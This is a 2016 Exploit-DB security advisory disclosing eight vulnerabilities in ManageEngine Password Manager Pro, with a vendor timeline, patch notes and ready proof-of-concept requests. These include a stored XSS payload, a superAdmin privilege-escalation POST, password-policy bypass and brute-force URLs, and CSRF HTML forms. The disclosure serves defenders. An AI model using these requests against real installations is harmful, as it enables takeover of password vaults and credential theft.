ManageEngine Password Manager Pro 8102 to 8302 – Multiple Vulnerabilities

• Exploit Database
• 41 阅读

• 作者： S3ba
  日期： 2016-04-05
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/39664/

• [Systems Affected]
   Product : ManageEngine Password Manager Pro
   Company : ZOHO Corp.
   Build Number : 8.1 to 8.3 and probably earlier versions
   Affected Versions : 8102 to 8302 and probably earlier versions
  
  
  [Product Description]
   Password Manager Pro is a secure vault for storing and managing
  shared sensitive information such as passwords, documents and digital
  identities of enterprises.
  
  
  [Vulnerabilities]
   Multiple vulnerabilities were identified within this application:
   1- Stored XSS in /AddMail.ve
   2- Privilege escalation in /EditUser.do
   3- Business Login Bypass in /EditUser.do
   4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
   5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
   6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
   7- Password Bruteforce for resources accounts in
  /jsp/xmlhttp/AjaxResponse.jsp
   8- Cross-Site Request Forgery
  
  
  [Advisory Timeline]
   17/07/2015 - Discovery and vendor notification
   17/07/2015 - ManageEngine responsed that they will notify their
  development team
   13/10/2015 - ManageEngine informed that they have fixed these issue
   14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
   15/10/2015 - Test on Beta build version 8300 was performed and
  confirm the fix of these issues 2, 4, 7 and part of issue 8
   02/11/2015 - ManageEngine ask more time to fix the remaining issues
  before making this public
   29/12/2015 - ManageEngine contacted for an update - No reply
   12/01/2016 - ManageEngine contacted for an update - No reply
   08/02/2016 - ManageEngine contacted for an update - small update provided
   12/02/2016 - Last communication from ManageEngine
   04/04/2016 - Public Disclosure
  
  
  [Patch Available]
   Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
  fix issues #2, #4, #7 and partially #8
   Password Manager Pro Release 8.3 (8303) (Released on December 2015)
  fix issues #1, #3, #5 and #6
  
  
  [Exploit]
   There is an exploit available that takes advantage of the Privilege
  Escalation vulnerability (Issue #2) and elevates a regular user to
  SuperAdmin, and then downloads the passwords and files stored within
  the application. The exploit code is available here
   - https://github.com/s3bap3/pmp-exploit
  
  
  [Description of Vulnerabilities]
  
  (1) Stored XSS in /AddMail.ve.
   This functionality is under the personal accounts stored in the
  application. However, as the page is also vulnerable to CSRF, an html
  form can be forged to create a personal account an exploit the XSS
  vulnerability. The affected parameter is "password", and the POST
  message to send is something like this
  
   [PoC]
  POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
  
  service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
  
  
  (2) Privilege escalation in /EditUser.do that allows to do 2 things.
   a- Hijack user's sessions by changing their emails and accessing
  the forgot password functionality.
   The affected parameter is "EMAIL" from the /EditUser.do web page.
  Any user (even PASSWORD USER's role) could send a craft POST method
  like the one below in order to change the user email address, which is
  being used to generate a new user password when the previous one was
  forgotten. The only attribute that needs to be changed from one
  request to another is the LOGINID, which is a sequence number that
  represent the User numeric ID.
  
   b- Escalate privileges by changing the user account status from
  Password user to superadmin.
   By forging a similar request it is possible to raise our own
  privileged to become a privileged user. For example, the parameter
  "ROLE" can be changed to "Password Auditor" "Password Administrator"
  or even "Administrator " and become it. It is also possible to become
  a superAdmin by changing the parameter "superAdmin" from false to
  true. This will allow us to take control of the application and all
  the passwords stored on it. In order to become superAdmin, the user
  role needs to be Administrator. Both can be achieved by forging the
  same request. In this scenario there are two parameters to be aware
  of.
   - USERID and LOGINID is the numeric account id to which the
  superadmin attribute will be granted (could be obtained from the login
  reply)
   - USER is the username to which the superadmin attribute will be granted
  
   [PoC]
  POST /EditUser.do?SUBREQUEST=true HTTP/1.1
  Content-Type: multipart/form-data;
  boundary=---------------------------20780287114832
  
  -----------------------------20780287114832
  Content-Disposition: form-data; name="isloginusersa"
  
  false
  -----------------------------20780287114832
  Content-Disposition: form-data; name="superadminscope"
  
  true
  -----------------------------20780287114832
  Content-Disposition: form-data; name="SERVERPORT"
  
  7272
  -----------------------------20780287114832
  Content-Disposition: form-data; name="OLDROLE"
  
  Administrator
  -----------------------------20780287114832
  Content-Disposition: form-data; name="USERID"
  
  4
  -----------------------------20780287114832
  Content-Disposition: form-data; name="LOGINID"
  
  4
  -----------------------------20780287114832
  Content-Disposition: form-data; name="USER"
  
  username
  -----------------------------20780287114832
  Content-Disposition: form-data; name="OLDLANG"
  
  en
  -----------------------------20780287114832
  Content-Disposition: form-data; name="EMAIL"
  
  pwned@user.com
  -----------------------------20780287114832
  Content-Disposition: form-data; name="ROLE"
  
  Administrator
  -----------------------------20780287114832
  Content-Disposition: form-data; name="superAdmin"
  
  true
  -----------------------------20780287114832
  Content-Disposition: form-data; name="Rule"
  
  Strong
  -----------------------------20780287114832
  Content-Disposition: form-data; name="DEPT"
  
  
  -----------------------------20780287114832
  Content-Disposition: form-data; name="LOCATION"
  
  
  -----------------------------20780287114832
  Content-Disposition: form-data; name="mobileaccess"
  
  enable
  -----------------------------20780287114832
  Content-Disposition: form-data; name="UserCert"; filename=""
  Content-Type: application/octet-stream
  
  
  -----------------------------20780287114832
  Content-Disposition: form-data; name="lang_code"
  
  en
  -----------------------------20780287114832--
  
  
  (3) Business Login Bypass in /EditUser.do
   The application allows only the creation of certain amount of
  Administrator, based on the licences. However it is possible to create
  more administrators. In order to exploit this go to the user
  administration page, and edit a user id. Save the edition without
  making any modification and intercept that POST message. Modify both
  parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
  the user role will be changed to this one. Every user can be converted
  to an administrator even if the license does not allow that much. The
  application only check the amount of administrators when "ROLE" is
  Administrator but "OLDROLE" is another one.
  
  
  (4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
   Every time a password for a user account or resource's user account
  is being changed, a request is sent to this path in order to validate
  the password against the password policy. Despite the fact the the
  password is being sent in the URL (this means it could be logged in
  any proxy or even in the browser), the policy against the password is
  being evaluated could by changed by modifying the parameter "Rule"
  from the value it currently has to "Low", in order to be evaluated
  with a lower policy. For example:
  
   [PoC]
  https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
  https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
  
  
  (5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
   When an administrator creates a Password Reset Listener, another
  administrator needs to approve it. The same happens when a Listener
  needs to be suspended. However this could be bypassed by creating and
  approving the listener by the same administrator. This could be
  achieved by forging a GET request like the following. The only
  parameter that needs to be changed is the "LISTENERID" which is a
  sequence number that represents the Listener.
  
   [PoC]
  Listener Approval
  https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
  
  Listener Suspension
  https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
  
  
  (6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
   It is possible to enumerate resource's user accounts by forging a
  GET request as follows. This URL allows, if a user has access, to
  retrieve the account password. However if a user does not have access,
  the error message changes if the user exists or not. The only
  parameters that needs to be modified are "Resource" and "Account".
  
   [PoC]
  https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
  
  The error messages identifies if the account exists for that resource.
  Account exists: ____ACCESS___DENIED__
  Resource/Account does not exists: FAILURE
  
  
  (7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
   It is possible to enumerate resource's user passwords by forging a
  GET request as follows. This URL is used in order to validate a user
  password against the password policy specified. By being able to
  change the password policy it is possible to use the "Low" policy
  which does not allow to reuse the password that is currently setup for
  the user. If an error message that the password could not be reused
  appears, that indicate that the password is the current password for
  that account.
   The only parameters that needs to be modified are "Password" and
  "ACCID", and ensure that the password policy "Rule" parameter is set
  to low.
  
   [PoC]
  https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
  
  The error messages identifies if the password is correct or not
  for every user account.
  Password matches: "Password cannot be same as last 1 passwords"
  Password does not match: "SUCCESS"
  Account ID does not exists: "Error in validating password policy"
  
  
  (8) Cross-Site Request Forgery
   The application is vulnerable to Cross-Site Request Forgery, which
  by sending specific POST messages it is possible create a user in the
  system (1), elevate privileges for a user (2)(4), and store a XSS in
  the user's personal passwords (3). Below are two PoC
  
   [PoC]
  User Creation
  <html>
   <body>
  <form method="post"
  action="https://192.168.0.3:7272/AddUser.do"
  enctype="multipart/form-data">
   <input value="true" name="superadminscope"
  type="hidden"><input value="true" type="hidden">
   <input value="true" name="isloginusersa"
  type="hidden"><input value="true" type="hidden">
   <input value="hacker" name="fname" type="hidden"><input
  value="true" type="hidden">
   <input value="hacker" name="lname" type="hidden"><input
  value="true" type="hidden">
   <input value="hacker" name="user" type="hidden"><input
  value="true" type="hidden">
   <input value="same" name="rbutton" type="hidden"><input
  value="true" type="hidden">
   <input value="Strong" name="Rule" type="hidden"><input
  value="true" type="hidden">
   <input value="" name="spassword" type="hidden"><input
  value="true" type="hidden">
   <input value="hacker@hacker.com" name="mail"
  type="hidden"><input value="true" type="hidden">
   <input value="Password User" name="ROLE"
  type="hidden"><input value="true" type="hidden">
   <input value="false" name="superAdmin"
  type="hidden"><input value="true" type="hidden">
   <input value="" name="dept" type="hidden"><input
  value="true" type="hidden">
   <input value="false" name="location"
  type="hidden"><input value="true" type="hidden">
   <input value="enable" name="mobileaccess"
  type="hidden"><input value="true" type="hidden">
   <input value="en" name="lang_code" type="hidden"><input
  value="true" type="hidden">
   <input type="submit" value="Submit">
  </form>
   </body>
  </html>
  
  Privilege Escalation
  <html>
   <body>
  <form method="post"
  action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
  enctype="multipart/form-data">
   <input value="true" name="isloginusersa"
  type="hidden"><input value="true" type="hidden">
   <input value="true" name="superadminscope"
  type="hidden"><input value="true" type="hidden">
   <input value="Administrator" name="OLDROLE"
  type="hidden"><input value="true" type="hidden">
   <input value="613" name="USERID" type="hidden"><input
  value="true" type="hidden">
   <input value="613" name="LOGINID" type="hidden"><input
  value="true" type="hidden">
   <input value="hacker" name="USER" type="hidden"><input
  value="true" type="hidden">
   <input value="en" name="OLDLANG" type="hidden"><input
  value="true" type="hidden">
   <input value="hacker@hacker.com" name="EMAIL"
  type="hidden"><input value="true" type="hidden">
   <input value="Administrator" name="ROLE"
  type="hidden"><input value="true" type="hidden">
   <input value="true" name="superAdmin"
  type="hidden"><input value="true" type="hidden">
   <input value="Strong" name="Rule" type="hidden"><input
  value="true" type="hidden">
   <input value="" name="DEPT" type="hidden"><input
  value="true" type="hidden">
   <input value="" name="LOCATION" type="hidden"><input
  value="true" type="hidden">
   <input value="enable" name="mobileaccess"
  type="hidden"><input value="true" type="hidden">
   <input value="en" name="lang_code" type="hidden"><input
  value="true" type="hidden">
   <input type="submit" value="Submit">
  </form>
   </body>
  </html>
  
  Stored XSS
  <html>
   <body>
  <form name="badform" method="post"
  action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
  accept-charset="UTF-8">
   <input type="hidden" name="service" value="1" />
   <input type="hidden" name="serviceurl" value="1" />
   <input type="hidden" name="loginname" value="1" />
   <input type="hidden" name="password" value="<!-- --
  --><script>alert('XSS');</script><!-- -- -->" />
   <input type="hidden" name="spassword" value="" />
   <input type="hidden" name="tags" value="" />
   <input type="hidden" name="Rule" value="Low" />
   <input type="submit" value="Submit">
  </form>
   </body>
  </html>
  
  Privilege Escalation
  <html>
   <body>
  <form name="badform" method="post"
  action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
  accept-charset="UTF-8">
   <input type="hidden" name="SKIP_PREF" value="true" />
   <input type="hidden" name="Admin" value="hacker" />
   <input type="hidden" name="FORWARDURL"
  value="UserTabView.cc%3F" />
   <input type="submit" value="Submit">
  </form>
   </body>
  </html>
  
  --
  S3ba
  @s3bap3
  http://linkedin.com/in/s3bap3